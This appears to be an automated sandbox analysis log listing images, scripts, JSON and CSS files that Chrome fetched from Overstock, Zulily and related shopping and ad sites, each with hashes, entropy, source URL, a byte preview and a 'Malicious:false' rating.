                                                                                                                                                                                    SHA-256:857B795367A89DB290071FE2B639A61B6ED5E7B46E40F02C8A3671A07DCD726B
                                                                                                                                                                                    SHA-512:8270D2CE0486ACF0A65501A528ADE3BC3269043FD65AAC5F2D6DF08AC4976CAC8036EA77D29E1BC5A7D8556DF07F24FFE899A24607450226F42C42927CDD3298
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-800X800_A1_Right.jpg?v=1729531877&width=650
                                                                                                                                                                                    Preview:RIFF,A..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .>..0....*....>E..D"..!)..hP..dn"....bdjg.y..8g........e~.l...wI...~jv......./....._3.{._.~..k..._...>....W......U.0.?............7.....?............/.O.....?....)........>........9.?.G..........z.o......./.......'.......?....9..?.........._.......?.4?....]...7..............C.c.........>.?.{\..................{.?.?........_._q...{.........F../...O.?...z~..w._......U~n...w.[...;./._...~........&..7....a..>....G.O.O............~.?..j.}...o.....?.y,.S..._....a..?......?.....O....~......g....!.......................O....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1106
                                                                                                                                                                                    Entropy (8bit):5.99999803162428
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TTCIl/X2YlXWI2PUSDJlf7iHRUYDieqv2dR94yq9K:qIl/XflwDJOUYeeq+zKyR
                                                                                                                                                                                    MD5:B421ECB3EF84C3D05550492A399B5FAB
                                                                                                                                                                                    SHA1:D738BD46297E8748001D57BD1E9DDE0E46DBD7AB
                                                                                                                                                                                    SHA-256:33740950420D01A9C35ADCE1B75C94C2586D5F5BBD160E18B65758DB43041D08
                                                                                                                                                                                    SHA-512:485744BC48E195039228E58EC5D870C646A705B80B39598A5FB1A03A4EFC00F8E8E7C2880E0891A0261B8420C4E47B0ECCBAD7E428322F79D32D56CE95FEF128
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_cb542fc5-769e-4a5e-b7ba-d67a36e62e27.jpg?v=1729325184&width=80
                                                                                                                                                                                    Preview:RIFFJ...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*P.P.>1..C"!!.... ....jt.$....P[..W..YHn.&.&sA.\S.(y......./.d..........{|.%...4..*`b........?.gUI.U....L...t.+9.[....*R.:E.F...__..Tri.E}.Z....o....}..Y.^.hS.E:f..z.K5..(g..:rj.<...F... a.f.B.Cn..l%JC..1...k..<...[z9.5i.LCe{..;]i.W......d.].r.!k.......6k..E...O9.2....w.....opS..N...+lv......6.....&..?.......@......'...2Y"c.m.......Yc.it..@......>..W.[.+.........l\v........<...RUsy..>?.=..J.\0..f2./....7k....EXIF....Exif..II*...........................V...........^...(.......................i...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):126260
                                                                                                                                                                                    Entropy (8bit):5.479246130446593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RY99WOBK+dyycke5wa0K9K9Ks/uNPIGt4btascq0lY7ajCYGu8yHiIHK3Ilo:RYvWeK+dVj09IKe7yC33So
                                                                                                                                                                                    MD5:CEB6B621E847FFB40A3EDA59F2E19BC5
                                                                                                                                                                                    SHA1:2E5D04EBE65572DF9E3080649CE957A2369D47C3
                                                                                                                                                                                    SHA-256:2CE94B39842C1156A5DDB2A0FEFE140BFC0D7BB646235DEB400321C830036973
                                                                                                                                                                                    SHA-512:DD2A5CC2E29F47C08B86D5CE78B4892D2944658DAC366B9CE97D8B5215E7FD397A8C3CBEEB713C9B5AEE875B2F1704A6943C6A8C2BBC949E04F9240C0CE4FC73
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={8771:()=>{},3482:function(e,t,n){var r,o,i;!function(s,a){"use strict";o=[n(3550)],void 0===(i="function"==typeof(r=function(e){var t=/(^|@)\S+:\d+/,n=/^\s*at .*(\S+:\d+|\(native\))/m,r=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(n))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(n)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var n=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),r=n.match(/ (\(.+\)$)/);n=r?n.replace(r[0],""):n;var o=t
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21917)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):21950
                                                                                                                                                                                    Entropy (8bit):5.268822432431172
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ss5gS2oxB07/1U3HEuncEcuO4Ourog9sqks6ULa/9J1lHR685asD949WrnQEo+kb:sb1U0uncEcuO4Oukg9sqks6ULa/9J1F0
                                                                                                                                                                                    MD5:413FC23E2CF4523879EAA651B15C7B97
                                                                                                                                                                                    SHA1:72E82F36157843FE6CD54347E80634F4314CABA5
                                                                                                                                                                                    SHA-256:98E6300A88C47DEC40CF3E167FA5A32D65FFE456093DA42F3D594881866C7A6A
                                                                                                                                                                                    SHA-512:4BBA1AFB6D9F7E4FF4E0FE7090D930A780068F70A9AD5004D795D590AFEA2D4EEBD231BF153392E784EDBB98AF2433B18DF7B75D4E6DD0F99F4787E4BD34BDFC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/main.js?v=174765838309616697151728391531
                                                                                                                                                                                    Preview:(self.webpackChunkdomaine_zulily_theme=self.webpackChunkdomaine_zulily_theme||[]).push([[411],{1296:(t,e,n)=>{var i={"./cart/index.js":[352,292,421],"./customer/addresses/index.js":[4483,869,612],"./customer/login/index.js":[5999,815],"./customer/order/index.js":[2282,6],"./evergreen-cards/index.js":[7410,869,601],"./example/index.js":[6573,869,792],"./flashsale-queue/index.js":[7740,803],"./flashsale/index.js":[3394,869,410],"./footer/index.js":[3826,29],"./header/index.js":[8636,636],"./power-reviews-war-form/index.js":[870,12],"./product-grid/index.js":[6068,821],"./product/index.js":[3095,292,630],"./promo-banner/index.js":[5469,869,439],"./recommended-products/index.js":[3339,869,416],"./related-collections/index.js":[8888,869,809],"./section-password-form-custom/index.js":[9089,618],"./slider/index.js":[4842,869,619],"./subscription-modal/index.js":[3952,404],"./toast-notification/index.js":[3860,213],"./utils/storefront/index.js":[299,653],"./vsearch-flashsale-collection/index.j
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.744543657452427
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfhafr6LRcLiRoLVNqLvqBELVFWLcg6pLgjgOLtAVLVyLV:YBsGLqLNLVkLaELVgLc1pLqfLQL0LV
                                                                                                                                                                                    MD5:89E9CE503ECD79EF18B0EA70B696EB1C
                                                                                                                                                                                    SHA1:102B2348D55ABBA81865AB4BF56AF7321DD7AC21
                                                                                                                                                                                    SHA-256:BDCEC8A9A7CE1B4AAAE4B4BFC371539597C64BD58E0945DE11C630BD60B42075
                                                                                                                                                                                    SHA-512:68B38BA0924958C871FA34C6328E014AF240FF5F116F2CD472C63A99DE37EC92E6C95BA64DE66140C4AE7AABA8F7CC808B1524595696620ECC844547E69929C4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/20227139%2C9621326%2C34310906%2C37701856%2C37507431%2C38319678%2C36638221%2C34061828%2C34997851%2C33962809/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"34310906","rollup":{"average_rating":4.45,"rating_count":118,"review_count":118,"answered_questions":0}},{"page_id":"33962809","rollup":{"average_rating":4.56,"rating_count":124,"review_count":124,"answered_questions":0}},{"page_id":"34061828","rollup":{"average_rating":4.84,"rating_count":214,"review_count":214,"answered_questions":0}},{"page_id":"34997851","rollup":{"average_rating":4.5,"rating_count":26,"review_count":26,"answered_questions":0}},{"page_id":"37507431","rollup":{"average_rating":4.79,"rating_count":28,"review_count":28,"answered_questions":0}},{"page_id":"36638221","rollup":{"average_rating":4.55,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"37701856","rollup":{"average_rating":4.33,"rating_count":12,"review_count":12,"answered_questions":0}},{"page_id":"38319678","rollup":{"average_rating":4.2,"rating_count":10,"review_count":10,"answered_questions":0}},{"page_id":"9621326","rollup":{"average_rating"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 1049
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):438
                                                                                                                                                                                    Entropy (8bit):7.473324706193056
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:XbT5akKJgr2i1SIU3FkOcVWj8M4eyRHPgIvPoXhnU6N:XbT5QiivVkOcVWYM4eKHPxvk1N
                                                                                                                                                                                    MD5:E98AB5A233E689BADCBD72E2D4E27EEE
                                                                                                                                                                                    SHA1:97959F8F5351A2C7426D04F406B55F229B4807DC
                                                                                                                                                                                    SHA-256:F80E6E65528A73AB9DE264BC30FB8B1E33195EFDA2258589329F4CC170447071
                                                                                                                                                                                    SHA-512:CD4AAF272D5927D5AF62499E387B06C58CEDD1826815D87356E631E3D5C79551B76E7113CD74ED7F3D0584BEAB73771E487B61570DA77311BD3F0F7EE3DF01ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.............N.0.._e6\)...R.Z..^.E..G.&....'.,...o..:eA..Hp.......}+...E.........$.Q...".|...pE.:...Sx....j[.OK.im7X.tP3O.F...........p...Fk.(..rQ.F.fN.}..#.N...j.f.Z...!o*g;S....t2]~?.G.W.p6..w.-.&_B........F.._...........^.p.>.3a.|i....2..m.. .fGF4....|......0..!..-....c...v ..~.he0...6.x.R..?q....X.......[.'...t.%eM..5B3..JT.X.2@...w..F;#.<...1P..i....\.-:(:....]....{..W!.....x...1c}.V.#...a.P......O..|H......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3460
                                                                                                                                                                                    Entropy (8bit):7.586912228706593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:3Il/Xfle8qJpJgoXC2P+RvO5blNKK1n86PIlHMEZHI7BOQ/c+fAyldX:3Il/XIJpb3P+C+K1n8lZHIY+fAm
                                                                                                                                                                                    MD5:E1FB1925C620E5839F9D773A570B239A
                                                                                                                                                                                    SHA1:B6DA376CCC16764FD83771D00EABA77E4E8C00A3
                                                                                                                                                                                    SHA-256:8FEE2C2D2024758FEAC3D522781E9429FD6727F5671D4B0EC6D8883CB762F2B3
                                                                                                                                                                                    SHA-512:634869C45A2D68774050F7143116B0BE395D1AD3FA4E41777AFDC392564764974F83AE859C988153A8B45046D8D9923BBA784534173DCB3A54D7832B32A2B8D9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e8dc3880-62f8-4f81-97f7-a8063d2a7e58.jpg?v=1729325110&width=80
                                                                                                                                                                                    Preview:RIFF|...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....(...*P.P.>1..C"!!..5. ....N..i..>...T...._m............Y....^.?........5...o..m...o...~.>..o.Or.y.f _%....).....G.?.o^./......s...S.f............`.......A.{E.........|."....;.?... ...m....?..a.)F=...I..8.6.2..aKE.mW.+......~}uL..2......=.r+L......&'CZ.N3.v..t..i...$.lj..l.E,...\Y.S.@.Z.{.8...E..,@oE..8..e....I...{..:.J...@.......u.@.....j.....2v...6QBIr..Y....S..~..h]..K..~.(.4...f.J......3K<.Q....0TFF.!...V.#..`l..+....rnm..BLF....E...D...CB....^.cr..2.g\......Fd.`7...g..*O.....b.+.J ...@f.P....,.uT[@.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1943
                                                                                                                                                                                    Entropy (8bit):6.727149786245265
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx9RlAa6DQ34DdUvGYGdqmu3ZEOZn:NBIl/Xrx906MdKCuJTn
                                                                                                                                                                                    MD5:9C13472EC7DBA0739CF6EFCD645344FD
                                                                                                                                                                                    SHA1:E6C91CA68045706B650976A5D34B701CBC9E7CB2
                                                                                                                                                                                    SHA-256:897833E12E6CAF2B8C86F81F0E120233DCF6D3233BF88663CFE1595EC3085BF7
                                                                                                                                                                                    SHA-512:3A88CD2EBFEDAF6CB3E3765E944724B655747622B91ADA9A93F7C3F177EAA76F061F9B60296013B95BB95B16C27EA03234CCAD35BD2B1EED6BFDC8E3D4ED7E50
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.......................................................................................1..6MM2...,.|t.........3e.y..&gr..d....[..g.Mr.wQ\^0)|..v../(..b.(.."Q....l....&V..9..(...........@..........................!1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):684
                                                                                                                                                                                    Entropy (8bit):4.905931501804048
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:trLJfDutv6IvMcyTH09Lf4QxcvtJETAcH9sQM8EGMxdZciHAie:t3JfDutZvI09Ln6+ljM8EGMlcHb
                                                                                                                                                                                    MD5:FFE5AF2DE8BB6BDB64C654D880C363BF
                                                                                                                                                                                    SHA1:A6F815956A7728C94CACD8C96030CED48FBBDBDF
                                                                                                                                                                                    SHA-256:867C793B860A8DBDC24FA5081B1926EE7E57B83A0AE509BFB709D55C86A69709
                                                                                                                                                                                    SHA-512:557182932715CB06BC20790385BEE87E05F5F2BDE5834FA98D4DB9029D578475B75B9303BC4DDFE490F24CD6197D63CDA3FA1E7BEF54ED14CDA2FDA415B9D649
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/star-empty.svg
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_678)">.<path d="M5.43359 4.75456L7 0.936694L8.56641 4.75456C8.66743 5.00078 8.89623 5.18459 9.17653 5.21188L13.1729 5.60093L10.14 8.39753C9.94081 8.58122 9.86015 8.85534 9.91524 9.11191L10.7955 13.2114L7.38559 11.0862C7.14905 10.9388 6.85095 10.9388 6.61441 11.0862L3.20449 13.2114L4.08476 9.11191C4.13985 8.85534 4.05919 8.58122 3.85998 8.39754L0.827052 5.60093L4.82347 5.21188C5.10376 5.18459 5.33257 5.00078 5.43359 4.75456Z" stroke="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_678">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):125
                                                                                                                                                                                    Entropy (8bit):4.204005083534792
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qYQgEaHqkYRedfFWx2hIYXE+w+seyeL+siJHn:qYQbkttWxgIeNLI
                                                                                                                                                                                    MD5:8D2F54111759C691A953D902208631AA
                                                                                                                                                                                    SHA1:9CAE89E749FB51B5B01EEC03464A34E2190AB471
                                                                                                                                                                                    SHA-256:377A17CE98EB244995F7D3D09B1194B15AA9F1F4DB5F5323B9F9187D3D06B39E
                                                                                                                                                                                    SHA-512:B25C388F446915BBAD1E9215375509D66D100C6585B67C9096D9BF0DA39C96A33182E7D30FD059372BBFBD21F9626B1BFFA0B585479DDE2D8DF2208CBFA542CA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/js/s_code_async.js
                                                                                                                                                                                    Preview:var s_gi = function() { . var s = {};. s.tl = s.trackLink = s.t = s.track = function() {};. return s; .};.var s = s_gi();.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69
                                                                                                                                                                                    Entropy (8bit):4.087898688625098
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YUzIwCfroKH9cSLJfRiI2HLCf6n:YUzjCfroK24tRt2rCf6
                                                                                                                                                                                    MD5:2D964E8A700809EC78091E2C67F65CF9
                                                                                                                                                                                    SHA1:D7F3081BEE6E506DF8469C68B8F92575CA43EB74
                                                                                                                                                                                    SHA-256:B86851FE85765C4D90E9AF04BDD726F9F58002A0130E81F907B65DC88A25218F
                                                                                                                                                                                    SHA-512:F3B804985AE1DFF0D3419ED4ADF2BD72632E0DFE3BBE728FE7AF6CCC0E71EB02BF5585AB431A80CC4F42B3B054D48B19F90884737B8CF78EE89E96A5A0D8B36A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"qrCode":{"enabled":false},"mobileDownloadBanner":{"enabled":false}}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):586
                                                                                                                                                                                    Entropy (8bit):4.642642905026912
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Cv0M65dXgU8aYUOEdSkFGpmucWc18uMhHbvomjkpyX/jFa:t4Cv0MMkaNkmucv1TMJbtm2w
                                                                                                                                                                                    MD5:9F670F647686A5B31708072F8DA32306
                                                                                                                                                                                    SHA1:E0A888534E0752DE43E5D5A8983BB540A62147D1
                                                                                                                                                                                    SHA-256:A2D616CC94ABA130E9942115CE3699092838AF822F138709939ECEEED67D0F98
                                                                                                                                                                                    SHA-512:CC2E55B0889BC1B82E9316F4047EDA73A2D6667DF5EA9C19571B3A97F01D81FF479F5F6F87587D21E954E27495127B14FA526F446351B5BBC4D9183FDCE3E906
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 8 8">. <path fill-rule="evenodd" clip-rule="evenodd" d="M3.67444 0.212345L2.63552 2.41511L0.312205 2.7684C0.0139737 2.81375 -0.105114 3.19732 0.110683 3.41748L1.79181 5.13257L1.39507 7.55424C1.34414 7.86508 1.65586 8.10212 1.92259 7.9554L4.00049 6.81247L6.07838 7.9554C6.34512 8.10212 6.65683 7.86508 6.60591 7.55424L6.20916 5.13257L7.89029 3.41748C8.10609 3.19732 7.987 2.81375 7.68877 2.7684L5.36545 2.41511L4.32653 0.212345C4.19315 -0.0704562 3.80782 -0.0704562 3.67444 0.212345Z" fill="#F39019"/>.</svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18732
                                                                                                                                                                                    Entropy (8bit):7.9529387544320365
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:aRttQ1fCYu2VKcpM6y1ofl82dZSBDxG7JRQx2eeBSSkKHLsXOHg7npO7h2ehZy8S:wY/4ilLZY2eeBSSkKsXPc3u1pi+2bS
                                                                                                                                                                                    MD5:4E5626C6E983CD0C70D44D21CA0A00F7
                                                                                                                                                                                    SHA1:084A86C7245BDC5A5EC17D2E4C4639081F555415
                                                                                                                                                                                    SHA-256:A6E7ADC0BE6932A9DBC770028C71E422D775AEF136EAEE3662C2CC65B0C3FAA4
                                                                                                                                                                                    SHA-512:683D7A12ACCD053320A8804B0D5048246FD103E778A93B4D9273A7D9BCB485F197F9A4D3D371D54C29C3C833AA2DBF8DCBDD6F90BD4304CDAF729963B6A7E981
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Furniture.png?v=1719612969&width=320
                                                                                                                                                                                    Preview:RIFF$I..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):25135
                                                                                                                                                                                    Entropy (8bit):4.706047497502984
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:0CTY9KkSfg1PjXo8thNlafuY2IojXzQ1UUzAQ1UUzsx7W:M2fgSSmMC
                                                                                                                                                                                    MD5:5DFEA97A69D86F8D0AC11F1E442B42AE
                                                                                                                                                                                    SHA1:B0B7C8E751751F480D9D1B9C09D36138E14F7B1D
                                                                                                                                                                                    SHA-256:C70080425C7F3115D6F686BBF73A336D1DD283479C0357CFB14F7DBCEF374D15
                                                                                                                                                                                    SHA-512:357589765F913BCF77E0F7E60A073CDDB05ECCB6AFE355A46DA28412C8F13DC0E8B574EEF631CFC5A63EA93DD3D967FAFD1F25F4AD440E24EF9374DE2D074610
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function noop() {.}.function assign(tar, src) {. for (const k in src). tar[k] = src[k];. return tar;.}.function is_promise(value) {. return value && typeof value === "object" && typeof value.then === "function";.}.function run(fn) {. return fn();.}.function blank_object() {. return /* @__PURE__ */ Object.create(null);.}.function run_all(fns) {. fns.forEach(run);.}.function is_function(thing) {. return typeof thing === "function";.}.function safe_not_equal(a, b) {. return a != a ? b == b : a !== b || (a && typeof a === "object" || typeof a === "function");.}.function is_empty(obj) {. return Object.keys(obj).length === 0;.}.function null_to_empty(value) {. return value == null ? "" : value;.}.let is_hydrating = false;.function start_hydrating() {. is_hydrating = true;.}.function end_hydrating() {. is_hydrating = false;.}.function upper_bound(low, high, key, value) {. while (low < high) {. const mid = low + (high - low >> 1);. if (key(mid) <= value) {. low = mid
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://rt.udmserve.net/udm/fetch.pix?rtbh=g0hMIegrEKzjHm5xeHMZm9yFfUyZVanf5JN19bo1aqE
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):78
                                                                                                                                                                                    Entropy (8bit):4.801445732171809
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1JDRfFGyXN1dDGLOIC0IWeiEcRmugQMC:DDR9pXNiCQwugQR
                                                                                                                                                                                    MD5:A79547EED1E9652E4E91D8F00BB4E7D7
                                                                                                                                                                                    SHA1:6B716AF5662B392C077493146DB6416712332FF5
                                                                                                                                                                                    SHA-256:9F0AD38B29EAE39C7841139C3DD23C4402F69B55FA403D47AFBD1116447D392E
                                                                                                                                                                                    SHA-512:F86950C72DECF1A1FADBC0E641C119663136A18F4FD937EE551E1D45133A7BCE3FF68657074176D5D0CDF00B317745AB39E7B040B0F666BF3EA0407CDFCE9C71
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/SubscriptionPriceBreakdown.Bqs0s4oM.css
                                                                                                                                                                                    Preview:.hMn1U{line-height:calc(var(--x-global-typography-line-size-default) * 1.15)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61
